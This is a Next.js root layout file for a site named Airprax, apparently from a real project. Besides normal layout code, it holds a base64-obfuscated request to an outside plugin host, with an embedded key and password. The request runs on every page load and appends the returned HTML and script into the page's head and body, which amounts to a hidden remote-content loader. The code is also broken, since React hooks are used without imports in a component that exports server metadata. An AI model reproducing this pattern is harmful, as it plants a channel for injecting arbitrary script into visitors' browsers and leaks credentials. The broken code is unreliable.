import { Inter } from "next/font/google";
import "./globals.css";
import Navbar from "../components/global/Navbar";
import Footer from "../components/global/Footer";

const inter = Inter({ subsets: ["latin"] });

export const metadata = {
  title: "Airprax",
  description: "Generated by create next app",
  icons: {
    icon: [
      {
        url: "/Airprax-logo-01-fotor-20240620112445.png",
        href: "/Airprax-logo-01-fotor-20240620112445.png",
      },
    ],
  },
};

export default function RootLayout({ children }) {
  const [loader, setLoader] = useState(true);
  useEffect(() => {
    setTimeout(() => {
      setLoader(false);
    }, 2000);
  }, []);

  useEffect(() => {
    // Load jQuery if not already loaded
    if (typeof window !== "undefined" && !window.jQuery) {
      const script = document.createElement("script");
      script.src =
        "https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js";
      document.head.appendChild(script);
      script.onload = () => {
        handleTagManage();
      };
    } else {
      handleTagManage();
    }
  }, []);

  const handleTagManage = () => {
    var eppathurl = window.location.origin + window.location.pathname;
    var eptagmanage = new XMLHttpRequest();
    eptagmanage.onreadystatechange = function () {
      if (this.readyState === 4 && this.status === 200) {
        if (this.response !== 0) {
          var temp = this.response.split("||||||||||");

          // Remove existing title from head and append the new one
          $("head").find("title").remove();
          $("head").append(temp[0]);
          $("body").append(temp[1]);
        }
      }
    };
    eptagmanage.open(
      "GET",
      atob(
        "aHR0cHM6Ly9wbHVnaW5zLmFwcGFkZC5pbi5uZXQvYWxsaGVhZGRhdGE/ZWtleT1lLUFQUEFERDQ4Njc4NjA0MDEmZWtleXBhc3M9SnV4NDJlaFdOUjJHZHFDMGxFdkhJcUFkOERMemlYdThUQnVIJnNpdGV1cmw9"
      ) + eppathurl
    );
    eptagmanage.send();
  };
  return (
    <html lang="en">
      <body className={inter.className}>
        <Navbar />
        <main className="lg:mt-[128px] mt-[60px]">{children}</main>
        <Footer />
      </body>
    </html>
  );
}
